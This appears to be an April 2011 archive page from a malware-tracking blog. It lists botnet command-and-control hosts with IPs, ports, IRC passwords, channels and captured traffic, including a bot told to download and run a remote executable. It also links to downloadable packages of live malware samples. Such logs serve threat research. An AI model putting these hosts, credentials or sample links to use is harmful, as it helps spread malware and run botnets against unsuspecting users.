Month: April 2011

up.scorevidic.net(botnet hosted in United States Baltimore Gandi Us Inc)

Uncategorized

* Dns resolving up.scorevidic.net – * Dns resolved up.scorevidic.net to 173.246.103.19 – * Dns resolving av.psybnc.cz – * Dns resolved av.psybnc.cz to 173.246.103.19 – * Dns resolving av.shannen.cc – * Dns resolved av.shannen.cc to 173.246.103.19 173.246.103.19 3211 173.246.103.19 4949 173.246.103.19 5900 Remote Host Port Number 173.246.103.19 4949 PASS ngrBot 194.28.44.217 80 213.251.170.52 80 216.45.58.150 80Read more...

70mb malware samples

Uncategorized

This is big package with diferent malwares like banking trojans,irc bots,trojan downloaders in diferent languages Download: http://a5181c44.tinylinks.co

208.98.40.230(botnet hosted in United States Missoula Sharktech Internet Services)

Uncategorized

Remote Host Port Number 208.98.40.230 3211 PASS google_cache2.tmp NICK n[DvLz-USA|XP]294793 USER 1810 “” “TsGh” :1810 PONG :9FCB5175 JOIN #DvLz DvLz# PONG :Irc.D3v1Lz.Com * Now talking in #DvLz * Topic is ‘!Msn http://www.youtubes.ca/watch.php?v=OnLhzs7d0E8 ‘ * Set by Sh on Wed Apr 13 20:50:32 infos about hosting: http://whois.domaintools.com/208.98.40.230

KGootkit(malware hosted in Latvia Users)

Uncategorized

Some features: Start/Install windows service: This executable starts a windows service. Services have the highest level of privilege in Windows, and are thus useful for a number of malicious purposes. Load driver: This executable loads a driver into the windows kernel. Device drivers are used by advanced malware (rootkits) to operate stealthily and escape detection.Read more...

67.159.63.23(botnet hosted in United States Woodstock Fdcservers.net)

Uncategorized

Remote Host Port Number 67.159.63.23 6464 NICK {XPUSA900275} PONG z3k4nt.audigier.Mx USER COMPUTERNAME * 0 :COMPUTERNAME MODE {XPUSA900275} -ix JOIN #z3k4nt2 MODE #z3k4nt2 -ix UPDATE: NICK {XPUSA830783} PONG z3k4nt.audigier.Mx USER COMPUTERNAME * 0 :COMPUTERNAME MODE {XPUSA830783} -ix JOIN #z3k4nt3 MODE #z3k4nt3 -ix infos about hosting: http://whois.domaintools.com/67.159.63.23

matea.dukatlgg.com(botnet hosted in United States Staminus Communications)

Uncategorized

* Dns resolving haso.dukatlgg.com – * Dns resolved haso.dukatlgg.com to 72.20.30.119 – * Dns resolving matea.dukatlgg.com – * Dns resolved matea.dukatlgg.com to 72.20.30.119 Dns resolved haso.dukatlgg.com to 67.159.63.63 Remote Host Port Number 213.251.170.52 80 70.38.98.234 80 70.38.98.237 80 70.38.98.238 80 72.20.30.119 8888 PASS ngrBot PRIVMSG #msn :[MSN]: Updated MSN spread message to “hahah.. your photo?Read more...

40mb malware samples

Uncategorized

this is another package with diferent malwares mostly irc bots banking trojans etc Download: http://0cc80bc0.goneviral.com

77.79.4.159(ngrbot hosted in Lithuania Webhosting Collocation Services)

Uncategorized

Remote Host Port Number 213.251.170.52 80 64.62.181.43 80 77.79.4.159 1866 PASS ngrBot or PASS xxx NICK n{US|XPa}mhewugg USER mhewugg 0 0 :mhewugg JOIN #!hot! ngrBot PRIVMSG #!hot! :[HTTP]: Updated HTTP spread interval to “3” PRIVMSG #!hot! :[MSN]: Updated MSN spread interval to “4” PRIVMSG #!hot! :[d=”http://64.62.181.43/dalnets/gaylord.exe” s=”94720 bytes”] Executed file “C:Documents and SettingsUserNameApplication Data1.tmp” –Read more...